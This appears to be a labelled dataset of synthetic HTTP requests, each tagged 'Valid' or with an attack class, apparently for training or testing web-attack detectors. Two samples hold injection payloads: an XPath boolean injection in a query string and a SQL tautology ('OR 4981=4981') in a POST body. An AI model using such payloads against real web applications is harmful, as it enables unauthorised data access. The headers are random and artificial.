User-Agent: r1hlietegt3kepsh
UA-CPU: x86
UA-Disp: 0564,279,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 289x684
Via: 2.6 www.iAhf.png
Transfer-Encoding: identity
Upgrade: mntn/9.1, 8tme/6.2, rRoA/2.8, jle/4.8
Warning: 613 www.Hxowi.gif "ooxsXtuvN0ccdOg4eio" "Mon, 26 Apr 04 22:54:11 UTC"
X-Forwarded-For: 22.125.3.165
X-Serial-Number: 0392549
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1829
Start - Id: 575
class: Valid
GET /sXMIU7-uQ/ieoatq/d_j1X8.Ot1B.MDBiVCX/whooIheeaRSedchonip/yicmweyki5drSOoous.shtml?osjtMeotln=182&echohavingIPposition=ymnvEeeaoenRedi&cmHNdysVtO=81309&aynxaeeweesnlm=aslirnerockc&-iylD=ehpjnaawoi7b&nhe=2103&eFhRYJq=tqlteeeoiug9ettno&h3tme4n8nOtc=02117590 HTTP/1.1
Host: 20.68.30.40
Connection: keep-alive
Accept: audio/basic, text/xml;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=4
Client-ip: 149.215.56.244
Cookie: Jce6anWbrf=yhmai sbdune9x:;H9eLyrTsi=3;lJO6rMjS8OrI=ei
Cookie2: $Version="3"
Date: Fri, 12 Oct 07 21:26:13 GMT
ETag: W/"ln37JRy0Pdvd44lMwj2"
Expect: 100-continue
From: nsineld@Rnhcetdcc.uk
If-Modified-Since: Thu, 19 Jan 06 16:58:34 CET
If-Unmodified-Since: Fri, 12 Jun 09 22:56:15 CET
If-Match: "H7HD5a1OLbH.@MP.S"
If-None-Match: "Im2bN5EGqp.IRyocyYf"
If-Range: Fri, 17 Nov 06 10:23:12 CET
Max-Forwards: 5
MIME-Version: 4.0
Pragma: 9osaeS=2u9RWgm
Proxy-Authorization: Digest uri=/enctRmn/arosaun.bin
Authorization: ooer arxl=7xVfetts
Range: -26
Referer: http://www.pat0a.ch/ohwin/s4eoer/twerc.gz
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: lkipYo/9.3.1.1.0
UA-CPU: MIPS
UA-Disp: 233,014,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 412x961
Via: eodi/3.8 www.mjRemot.css:3, HTTP/1.1 www.he4A4.shtml:19699, s4tAc/3.5 www.ctoes.jpeg:981
Transfer-Encoding: compress
Upgrade: geg/6.2
Warning: 199 www.i5eaua.tiff:358 "tmAlqEEsinThHteL" 
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 812808464
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 575
Start - Id: 32210
class: Valid
GET /hAt.php? HTTP/1.0
Host: www.meetsoe.net:80
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: oceliuhf-qIt;q=0.8, dlAsc-tesbe;q=0.3, oShr-ir0pfdoE;q=0.0, uahe-yrnmlb;q=0.4
Cache-Control: no-store
Client-ip: 35.244.158.238
Cookie: wD@lib=esasNeds84<)n;deene=t;wnaeRo=etmps uMa;ttmitdaEci=11147855;HWV2= eot<0rTtewh$s
Cookie2: $Version="60"
Date: Sat, 07 Jan 06 21:08:32 CET
ETag: W/"hS5or9k73q@J-Il"
Expect: 100-continue
From: e26srb@io4s2eeaid.gov
If-Modified-Since: Mon, 12 Jul 04 08:11:50 CET
If-Unmodified-Since: Tue, 18 Oct 05 08:05:55 CET
If-Match: "R87G4_IAN1RGNwD"
If-None-Match: "weir1KGW2kfeKue_"
If-Range: *
Max-Forwards: 673
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: NTLM aElzZWVzdGx0MGpzb2lpd2RmMGNpbHM4bW9PVHVoZ2xub29uY1VyZTBJR2xlbHA=
Authorization: Basic ZW9lc1MzOmRoZGVzMQ==
Range: -31011,02795-
Referer: http://www.entaz.org/m8lk8e/fetrdnrt/wele8EwN/upat.mpg
TE: gzip;q=0.4,trailers,deflate
Trailer: Range
User-Agent: utokdOtun
UA-CPU: 68000
UA-Disp: 666,662,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9868x2835
Via: rLhh/7.8 www.FcOas.js
Transfer-Encoding: gzip
Upgrade: wahas/0.3, g2i27/7.9, nondad/8.9, en7/2.8, tgms/5.0
Warning: 465 144.103.243.13 "dfhVber4aysot1d" 
X-Forwarded-For: 122.80.70.14
X-Serial-Number: 76488
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 32210
Start - Id: 49173
class: XPathInjection
GET /gjcb/o.@hrj_It.hlBLh/v41xice/oNLK4utR6/xARAnBkL1Ue97jw/mn67.jpg?zb7Wyo=iNdivrm&pRwiedeKwtpna9w=evurqmuqha&abeeRw=i7f&itelmoWsntqtisu=cnxDuehR%27++or+++++%28i++++%3C+++++count%28hei%2Fchild%3A%3Atext%28%29%29+++and++j++++%3C++count%28Lnr%2Fchild%3A%3Acomment%28%29%29+++and+++++k+++%3C+++++count%28rrs%2Fchild%3A%3A*%29+%29+++or+++++%27o7he22nm%27++%3D+%27++++pcs%27+++++or&tlneLaj=lpioss&uRIiyiapAuesgnt=n&ciaEyebN8epgwd=dpo&htsetsEtoh=djeo+Rjscriptjf&9ulo9nSdpd=dfTpS-&49XHhGwHvR=193&6gCC.7PRki=gzu1vbe HTTP/1.1
Host: 233.64.251.119
Connection: guwe
Accept: video/*;q=0.1, audio/*
Accept-Charset: utf-7;q=0.8, shift_jis;q=0.4, cp-950;q=0.2, iso-8859-2;q=0.2
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: rtsalmu=gehs
Client-ip: 38.175.250.11
Cookie: mfihztew9l0seIj=9
Cookie2: $Version="7"
Date: Sat, 26 Sep 09 19:10:33 CET
ETag: "mOIFkg9nVCC_XPd"
Expect: 100-continue
From: sbgdd@uletat2q.net
If-Modified-Since: Sun, 18 Nov 07 22:16:25 UTC
If-Unmodified-Since: Sun, 16 Nov 08 08:04:31 GMT
If-Match: *
If-None-Match: "st4x0Mea.kYgi2.46"
If-Range: *
Max-Forwards: 511
MIME-Version: 2.4
Pragma: Eec='Lhos'
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: Basic NGk2ZWVsOnJhcm1sSGM=
Range: -695984
Referer: http://www.ectsrsdw.it/dtpe/7iFu8eb.dll
TE: gzip;q=0.4,trailers,trailers
Trailer: TE
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 8.3; Sw-re; rv:9.8.7) Gecko/81056782
UA-CPU: x86
UA-Disp: 8001,6616,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 290x3654
Via: HTTP/4.0 www.ntai7ec.js, 9.8 www.hiaeS.shtml
Transfer-Encoding: gzip
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 382 78.125.64.215 "ptlueeneohddxrty" "Fri, 18 Jul 08 15:26:47 UTC"
X-Forwarded-For: 162.244.173.223
X-Serial-Number: 6850092
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49173
Start - Id: 8880
class: Valid
GET /ykauMShJiitor/tmeDeohybt/iEayott/oi5i.jsp?TgL6Q=58981954&n0a=irqyaOobimrncrh HTTP/1.1
Host: 65.240.157.149
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 36.44.215.228
Cookie: iahYdhD=Eh;tdw34cto=dt?5twf;rtinr=w ee>vhhphpbodyWce;abo=1GE1arY
Cookie2: $Version="1"
Date: Fri, 30 Sep 05 23:13:20 UTC
ETag: "gk1RxozSldqS1ixREt"
Expect: 100-continue
From: e9ioSmhn@umuDc.biz
If-Modified-Since: Wed, 20 Apr 05 06:56:12 CET
If-Unmodified-Since: Thu, 05 Feb 04 20:34:00 GMT
If-Match: *
If-None-Match: "9SfFhpkIDIo_pFR"
If-Range: *
Max-Forwards: 3624
MIME-Version: 0.7
Pragma: csio='t'
Proxy-Authorization: NTLM dHNyVHYxaGZzYmZhanJidG91N3NManJUbGhpaG5pc25pd2N0YXM=
Authorization: NTLM bm5xdHN0ZGh3ZGlmbWlJUnNhYWhxZG9uVWV3bWV3MjJ0OHJuaHhn
Range: -38204
Referer: http://www.agrrh.com/5sgniZhe/honlrE.php3
TE: trailers
Trailer: Expect
User-Agent: q8nie0esk/7.5.8.0.5
UA-CPU: Sparc
UA-Disp: 012,690,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3568x0188
Via: 3.5 www.aesncvt.tiff, 0.4 www.Tt4i.html
Transfer-Encoding: i8tt9i; dee3at=eHtysi
Upgrade: rudtA/2.1, e5r/5.2, Ndas/0.8, iomgfE/7.8
Warning: 595 34.218.228.95 "fFoep9Eetebeekisett" "Mon, 07 Jun 04 13:30:19 CET"
X-Forwarded-For: 38.43.108.176
X-Serial-Number: 8434759512
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8880
Start - Id: 30999
class: Valid
GET /ny549ji7AKhqeoomP6Q7/Raoeyictyf0oe/sjogJ@tK2FjH6/tKx1V3g/em7s0TMECB.Ub0dh/aosetJdIo.msf?ttei=e2uuedNddS HTTP/1.0
Host: www.eraa.be:117
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip, gzip
Accept-Language: buecaqo2-8a, 56zt1-4s3l, eatfvhe-eaHwn2;q=0.2, l9mo-vl
Cache-Control: d7ieob='o6atbTsv'
Client-ip: 93.143.127.166
Cookie: i5Idnd1nn=o;es=aj'nbmrgrI we;eh=82;p42cl=0735549416
Cookie2: $Version="428"
Date: Thu, 24 Feb 05 16:53:32 UTC
ETag: W/"el0c1yy8dBuCFQ9LYC"
Expect: iRaev2ns
From: vle24@irebeh.gov
If-Modified-Since: Tue, 15 Dec 09 08:10:41 GMT
If-Unmodified-Since: Tue, 27 May 08 19:55:41 GMT
If-Match: "d2pM26oWGxvU3g-g"
If-None-Match: "ofXfLh5gt4u._ERnZx"
If-Range: *
Max-Forwards: 10
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: eeu7 ueeiov3a=orpt7utl
Authorization: oruuf7 wHfgjuhs=tITezFs
Range: 740-8502,247843-588
Referer: http://www.LiOrfsr.it/Tac7oe/49in/ionE/seei6.php3
TE: gzip,deflate;q=0.4,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: n9rsWs6rS http://www.tDu6.biz
UA-CPU: MIPS
UA-Disp: 9729,1420,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 777x272
Via: nlc/6.0 35.250.117.196:1017, sstre/3.6 www.deeadeO.css
Transfer-Encoding: identity
Upgrade: eeeh/0.3, fDafA/6.5, cd2jet/7.1
Warning: 175 www.rwitemw.jpeg "lzlarmInhrd" "Wed, 18 Jan 06 20:37:52 CET"
X-Forwarded-For: 73.18.235.121
X-Serial-Number: 65625
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30999
Start - Id: 7168
class: Valid
PUT /NhcesoaO0alhlCrKuh/gx.4CT.cgi? HTTP/1.0
Content-Length: 26
Content-Language: tco16v,aiXi
Content-Encoding: deflate
Content-Location: /cacnNdcp/qtars/AolCe9Pa/vGYtTeq.jsp
Content-MD5: b25oZW9CaWVJQW1laWFiaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 Dec 08 20:42:05 GMT
Last-Modified: Thu, 05 Jan 06 06:01:24 GMT
Host: www.lyvine1ha.be
Connection: close
Accept: application/*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, identity
Accept-Language: niqnnde-zm2, xub-uRIje;q=0.6
Cache-Control: max-age=9591
Client-ip: 18.92.209.44
Cookie: saote=0;ylsnya=32;daLk=nh;esyhyr=94d3rB;eglaleddi5hao=nhcalnssnau8h2z
Cookie2: $Version="09"
Date: Sat, 10 Apr 04 07:54:06 UTC
ETag: W/"ohPrWn9pRXSvqiUrHr"
Expect: s7volne=emitjeer;Aor3r=dsiei5j
From: a0Qar@yilcQa.net
If-Modified-Since: Fri, 19 Aug 05 20:06:27 UTC
If-Unmodified-Since: Tue, 03 May 05 01:33:19 UTC
If-Match: *
If-None-Match: "2BrKhw7N9WEkf2A3xW5"
If-Range: Sat, 20 Aug 05 22:50:56 UTC
Max-Forwards: 7
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Basic aHV2dEFhdDpzaDlzcg==
Authorization: aofO tmaltalu=yrxmr0ud
Range: 21-
Referer: http://www.rienhE.st/o7tcjs/qhdruhto/liTyhhpi/satma/laho8re.jpg
TE: trailers,deflate,trailers
Trailer: Pragma
User-Agent: nRae8Z1au
UA-CPU: MIPS
UA-Disp: 595,7224,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 976x2484
Via: 9.5 www.Nnstd.html, 3.5 237.197.41.244, 9.1 20.106.178.43
Transfer-Encoding: eennb
Upgrade: ootqah/6.7, il5/2.2, feDseo/1.9, sce/8.2, s2ch/9.0
Warning: 182 www.pwrIb.tiff "sneT6ohrn0tai1orzb8r" "Sun, 07 Jan 07 08:29:21 CET"
X-Forwarded-For: 199.16.54.101
X-Serial-Number: 94479468040904290
----: ---------------
~~~~~: ~~~~~~~~~~~~~~

ksyOdfadameeyos=6552357808

End - Id: 7168
Start - Id: 41462
class: SqlInjection
POST /SeeaemvUoaeOt/nons/omt5nonnpap1muti.tiff? HTTP/1.1
Content-Length: 292
Content-Language: euuU5Q
Content-Encoding: gzip
Content-Location: /hhaiuti.bin
Content-MD5: U2VyaXN4c25iYWVhc2VoVw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Feb 04 02:31:15 UTC
Last-Modified: Tue, 25 Oct 05 15:57:08 GMT
Host: 185.86.107.222:80
Connection: yntosh
Accept: image/*;q=0.0, application/*
Accept-Charset: windows-1257, iso-8859-8-i, ks_c_5601-1987;q=0.8
Accept-Encoding: *
Accept-Language: l-nh;q=0.6
Cache-Control: max-stale
Client-ip: 131.147.44.241
Cookie: hev=12282;Yh0bc=3;ct9=sr9u>;LsstoLZrtosbpdr=3;rm=9bainljietaldss;aqy=i zes?eacz egijr6p
Cookie2: $Version="83"
Date: Mon, 27 Oct 08 08:45:36 CET
ETag: "sthKhUmpoIefQLam-l"
Expect: ttsRiz
From: utrstns@Temsn.st
If-Modified-Since: Thu, 09 Dec 04 03:52:25 CET
If-Unmodified-Since: Thu, 04 Aug 05 03:44:54 UTC
If-Match: "V5f_NPqKCaGDBLf5pB"
If-None-Match: *
If-Range: *
Max-Forwards: 71
MIME-Version: 2.7
Pragma: m=enOahsq
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: Basic cndpdDo3MHNqYXc=
Range: 863-,45-,1-
Referer: /iay7/suIbfase.asp
TE: trailers,deflate;q=0.4,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 6.1; tw-sa; rv:2.6.9) Gecko/26414231
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 254x5165
Via: Wns/7.5 www.shdanli.jpg
Transfer-Encoding: gzip
Upgrade: ilbd/6.7, 6Adhh/9.1
Warning: 500 www.ahpvda.gif "wpsouzhnbeu6jkz5A" "Sat, 07 Oct 06 04:07:23 UTC"
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 40748942
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

eyi3or3=pgwTauo&94JSBR=rLypoD5@&qmoud=5r4hdosrel rciservices&Oea=e~dadse&eiigzepsni0ei=4ia\ed1tn&3e=bidi&libW.Bt8Bm=5484490311&A9Eoorigp=&dmh&p@qsock_streamQy5=79348139&uindjh=aed&eNjagwklSncrhi=OR     4981=4981&oO=iTToDQo.Y&veyxKb=avh tfbeaagId&ialsehon7jaed=SetRd&baltsnloooei=275

End - Id: 41462
Start - Id: 16481
class: Valid
GET /oehnzpheihrstaoHpbt3/r0jlycVBQQSf3w/CEioVWtaNFJJ/tDK5mstdin23Hwidreplacej/24ah87-crZWg4/nJQAmGjDWh/rAmoO1vn.exe?QqTNfU6jd=468980&Crn=0a2lpO&lrX4tr=r&iabEksontnezitm=bnxkw2M HTTP/1.0
Host: 55.174.161.101:80
Connection: keep-alive
Accept: audio/x-wav;q=0.6, text/*;q=0.5, video/*;q=0.7
Accept-Charset: x-mac-arabic;q=0.3, euc-cn, windows-1251;q=0.6, x-mac-ce;q=0.7
Accept-Encoding: gzip;q=0.6, compress;q=0.9, compress, compress;q=0.6
Accept-Language: *
Cache-Control: min-fresh=399
Client-ip: 237.89.204.8
Cookie: 4sbMUvJG=6
Cookie2: $Version="1"
Date: Fri, 16 Sep 05 01:17:41 GMT
ETag: W/"PfRciWS9of8EULYeN3@z"
Expect: afoOaee=ibrbtE
From: enneeci@ehirrnmall.it
If-Modified-Since: Sat, 07 Mar 09 15:29:39 GMT
If-Unmodified-Since: Thu, 18 Oct 07 12:49:05 GMT
If-Match: "hnil.nI4lE1zUM53F_v"
If-None-Match: "IEjByDr55h87IgXte"
If-Range: "5oEp8CvexltzMBUhVu"
Max-Forwards: 4
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: Basic dm9zVjphaGZ1YWU=
Range: 6367-5472
Referer: /lenaer/te6e/Sneyos/eneoieac/rkNary.mspx
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/3.8 (Machintosh; U; PPC Mac OS X 3.4; gf-x3; rv:7.2.9) Gecko/32153979
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 714x1442
Via: HTTP/1.0 www.mps3.html
Transfer-Encoding: identity
Upgrade: stdm/8.2, nyada9/9.8, Hlft/8.4, sarer/8.3
Warning: 543 www.tjetzkwe.png "ctadem" "Wed, 01 Aug 07 06:58:08 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 764868889317962495
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16481
Start - Id: 34879
class: Valid
PUT /1gaanhbeoiarha/rc8gePmtbtb/A@nullm1Land0jYSiBsp.gif? HTTP/1.0
Content-Length: 166
Content-Language: nt3blt,nfs
Content-Encoding: identity
Content-Location: http://www.enlojti.org/cswtcce/addyleyr/pIacn.html
Content-MD5: aHN0bW9lZWhkaDdlc2FkMw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Feb 09 16:48:40 UTC
Last-Modified: Mon, 05 Mar 07 02:27:22 UTC
Host: www.5crnUh.cz
Connection: vnyt
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: h-iefro;q=0.5, e-rr;q=0.1
Cache-Control: 5ht=Efy8ron
Client-ip: 148.13.5.11
Cookie: Ourvo7=jaeemo7Ztae9o;nni5ss0euqeoa=8532184
Cookie2: $Version="22"
Date: Mon, 17 Mar 08 01:09:13 GMT
ETag: W/"-diUSjoSjZvkmgKF1Nm"
Expect: 100-continue
From: aioNe@o85EoEesvN.org
If-Modified-Since: Tue, 28 Jun 05 13:32:02 GMT
If-Unmodified-Since: Fri, 27 Feb 09 11:38:23 GMT
If-Match: "PBZxFGck2Io@0JB2Q"
If-None-Match: "O@RUCRTcvRVGJmm-5"
If-Range: Fri, 13 Apr 07 14:44:19 CET
Max-Forwards: 647
MIME-Version: 8.7
Pragma: etclzii='oHhai'
Proxy-Authorization: NTLM U21lZDd1WG1kclRVdGx6cWNwbW82czhhbmk0bXR5bmllYXRvbHNxbnRhbDRlZQ==
Authorization: r6tiem 6txw=nUly
Range: 092889-
Referer: http://www.co8lomsj.gov/heet/orteot/lsXE0ro.nsf
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/7.0 (compatible; Konqueror/2.8; Unix; g4mawroir; eecbehafp)
UA-CPU: MIPS
UA-Disp: 6897,377,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 084x478
Via: seuii/7.9 www.khre.css, HTTP/1.7 219.102.247.135
Transfer-Encoding: gzip
Upgrade: oqmk/3.2, ha4hci/5.3, s0lss/9.2, rgiena/7.5, ersnen/5.4
Warning: 197 www.aRtfe.js "nixbwit" "Wed, 24 Sep 08 09:37:18 CET"
X-Forwarded-For: 186.251.191.52
X-Serial-Number: 2485282354068537575
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fiojt=aeari&aaoareetSqIee=chcrsmn&afobt=aselectenca&kes6sy=67284&GincludejMp0UBqWy_=sat] &inohhsgsawtoh=jw5&ehaiela=ehn2ehn1nafb&ibhlhal=c4JX8RjD4A7&cinj=indeletern

End - Id: 34879
Start - Id: 33714
class: Valid
PUT /tcuvroeDdQgtZWpJOOUJ/konmw/eebntnsiffrrk8ho/Oy/cYwZJM3pLbody/tdIHEm.php? HTTP/1.0
Content-Length: 334
Content-Language: n,evhcEitn
Content-Encoding: identity
Content-Location: http://ojssetlo.com/daut.fgf
Content-MD5: Y3RlbmE4MmRoc3NDbmFyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Nov 09 03:40:59 CET
Last-Modified: Sun, 09 Oct 05 21:12:54 UTC
Host: 215.229.162.107
Connection: teNhu0
Accept: */*;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.5, deflate, gzip
Accept-Language: *
Cache-Control: xye='r'
Client-ip: 16.66.77.9
Cookie: tt=aSi;sh_l.=179
Cookie2: $Version="4"
Date: Sat, 13 Mar 04 11:45:58 CET
ETag: "7DuOUIJ1TZfdnVUl"
Expect: oM4iit=9tedi
From: eSwnhmt9@baaeh4uleA.net
If-Modified-Since: Mon, 15 Nov 04 04:12:26 CET
If-Unmodified-Since: Wed, 12 Jan 05 20:07:11 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 17 Jul 07 04:35:55 GMT
Max-Forwards: 89
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: NTLM ZWJqZ3Bxc2RwaWVxZXJya28zRWVtcTFnaWV0NHJlaGR3bmNuMWF4
Range: 521419-715172,4927-26503,-3630
Referer: http://www.tdnloI9p.it/7Ebry/7eo2d/cyltiuc/szduaN.php
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.5 (X11; U; Linux i386 6.4; fS-de; rv:1.5.3) Gecko/18373027
UA-CPU: x86
UA-Disp: 9133,083,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 520x205
Via: HTTP/3.0 36.69.189.9, HTTP/1.7 www.ndntwe.htm:2231
Transfer-Encoding: compress
Upgrade: ricefc/1.7, det/8.3, 4ue/4.8
Warning: 169 www.deqz.htm:7727 "bhneliecthdnon3n6p" 
X-Forwarded-For: 145.242.152.101
X-Serial-Number: 695598853636
----: ------------------------------------
~~~~~: ~~~~~~~~~~

estftxt=fJg&Hwceeuesse=53544&opaoa0npu=oGh4U61&ihIlidyegr5pO=ugx&B.Uas=66813982&nCLVUhome8p-=neunionyaEi4&nsn=uZQ@zIHGLTru&8qnr4B0=rr'an9elle&7X3or.LNGobz=xb&oih-=9hitcRUeuld1h&1Oal9eqOApdTesG=1&Htrnro0otry1x=itrennmeneoy&MzJETzo= veI|dre0mcmdnhttpt<&geet8nFlyotm=aa pfcopyitescripteteob&replaceinsert.wgetgHPMdivi-=keuo6sstnm

End - Id: 33714
Start - Id: 34610
class: Valid
POST /imemeualToemrmeanish/uB5A@7/cFnW9/rb@/lilihttr/erfn/iirlesd/mEbFc1fG.pl? HTTP/1.0
Content-Length: 217
Content-Language: pn,rzEgo
Content-Encoding: deflate
Content-Location: /vncecE/lt0Y5q/Ohsrroi.html
Content-MD5: bmlpdXRlYW11dXI1b2Nydw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 29 Mar 08 14:05:05 GMT
Last-Modified: Fri, 28 Jan 05 22:17:50 GMT
Host: 217.68.128.155
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ncDcye-rqi, m-ktnlp, ist1xaht-toio8rN
Cache-Control: max-stale=7
Client-ip: 242.105.146.186
Cookie: tdd7huLuatecadt=nlI_7HAL;nusTtlee9=6;cstoSwetidcaA=9744
Cookie2: $Version="2"
Date: Thu, 30 Jul 09 13:35:30 CET
ETag: "QNPLYd_GvF9NCbDLk92"
Expect: rbDh=iltboelJ
From: 9acwoadm@8yele.org
If-Modified-Since: Sat, 11 Jun 05 07:09:26 GMT
If-Unmodified-Since: Mon, 28 Nov 05 22:41:02 GMT
If-Match: *
If-None-Match: "SDPmxdJuSysy2hX"
If-Range: "XNsbp_l7qmMibQVm"
Max-Forwards: 7
MIME-Version: 3.3
Pragma: DfoCt='YihrtB'
Proxy-Authorization: Basic dzJ6cnE1aTpjaXNlZ2E=
Authorization: Digest algorithm=MD5-sess
Range: -64
Referer: /RaNvTr/nfSdswd/lfmJvo/SsTWcenb/srn4n.txt
TE: deflate,trailers
Trailer: Range
User-Agent: xscoww (bSEV_PF; nVsXbz; oCnVKTil8)
UA-CPU: PowerPC
UA-Disp: 017,016,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6005x647
Via: 3.9 www.0ifseT.shtml
Transfer-Encoding: deflate
Upgrade: i0taeg/8.4, k4xlia/5.0
Warning: 889 www.0ne7i.css "tiEaal7iotnjge" "Wed, 24 Jun 09 03:48:23 GMT"
X-Forwarded-For: 234.124.3.68
X-Serial-Number: 1977553705
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ewbg5osVthhr=2g&plvetioae78=eF77h&bdrmzetp=agfYNuVPld@O&xQwget1IlRH=3807&mr=rehuoeebfmAME50&66Wrsesstehae=fovsjbu3ye1rjde&cb3ga=rerieu0bnbkoyee&mni0e8d=82976156&t5mtc=i8pld/iniXeIu&sritsaxbze=iysystem]o6tbaoasie

End - Id: 34610
Start - Id: 25856
class: Valid
GET /qCCXMYjbnBAn4u/s6ic1phkG/FQq6Ef/SiEssyeiny3fdrTYt/Nb@aj.img.3I7AVi/GQ2FmG/laiywulfjoeais/yBNw/acceptO/OJncOUj4position6/y_ppUHL-m0_RH.bin? HTTP/1.1
Host: www.idbmhdu.de:279
Connection: close
Accept: audio/*, video/*, application/x-tar
Accept-Charset: x-mac-greek, euc-kr;q=0.9, iso-8859-4;q=0.7, iso-8859-8-i
Accept-Encoding: *
Accept-Language: t-l, we-lt;q=0.6
Cache-Control: ar='8'
Client-ip: 208.224.54.200
Cookie: ncrsiyxbj=ph5hetre n;s4=sOlibbetweendocumentiTn4wgeta;ribeTnn=stdin1seesmocha
Cookie2: $Version="1"
Date: Sat, 28 Oct 06 12:31:11 GMT
ETag: W/"6MIaRp5ZKJjYE0qAeHSK"
Expect: 100-continue
From: ejAah@oon5i.ch
If-Modified-Since: Tue, 24 Feb 09 13:49:35 UTC
If-Unmodified-Since: Tue, 29 Jan 08 14:35:52 GMT
If-Match: "oMJ1m.MiWE7Rjg4Zc"
If-None-Match: "QxkIjNHqb12O3ti25d"
If-Range: *
Max-Forwards: 80
MIME-Version: 2.6
Pragma: 3raimtRd=g
Proxy-Authorization: lpm4t aNaOhes=tssi
Authorization: Basic YkJlYW9vdU86amFmcw==
Range: -434
Referer: /arlCeH.shtml
TE: chunked,deflate,trailers
Trailer: Accept
User-Agent: Mozilla/5.4 (compatible; dOretdeh8d; Mac OS X; imnktby; Den62)
UA-CPU: 68000
UA-Disp: 587,0940,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 976x788
Via: 2.8 103.78.212.249, HTTP/1.4 www.wit3.html:87977, arett/7.3 www.arrt.gif
Transfer-Encoding: deflate
Upgrade: IuMf/4.2, qotH/5.2, nsgah/4.2, nTi/6.8
Warning: 430 4.80.20.99 "go7tpeadnR8aoEojob8" "Wed, 21 Sep 05 10:38:47 CET"
X-Forwarded-For: 191.147.18.123
X-Serial-Number: 3343332973259151687
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25856
Start - Id: 10021
class: Valid
GET /gqjd/swhere_qu/eaTm/tsatdibaiTioghs/nA4YMkfwAwItfenk/rOhth4/EUTpVUglMO.html?ne12yrghlEruas=65133447&MfOWU=iisiinrosh&n3irhviilmts=dqt&Ipmo=45935363&lob=ceS1AfeYfsConlgz&eueaynoroeei=adeletenh HTTP/1.0
Host: www.2rrir.ch:80
Connection: close
Accept: */*
Accept-Charset: euc-cn;q=0.1, iso-8859-9, x-mac-korean;q=0.6
Accept-Encoding: identity;q=0.8, deflate;q=0.0, identity, identity;q=0.7, gzip
Accept-Language: *;q=0.8
Cache-Control: min-fresh=7
Client-ip: 230.4.173.142
Cookie: R5oi=tLQXWIRN;tn8rtsfh2entdTd=l0reoc;ouaeoddUie4el=aeahg;aerit5;y44Nono0B=92188;l3rte=a1zBTRFameO
Cookie2: $Version="927"
Date: Mon, 29 Jan 07 17:16:21 CET
ETag: "37Du@YuAnBeW63f@"
Expect: 100-continue
From: ma7sea1@tueds.com
If-Modified-Since: Sun, 06 Mar 05 02:42:56 CET
If-Unmodified-Since: Sun, 03 Sep 06 20:13:47 UTC
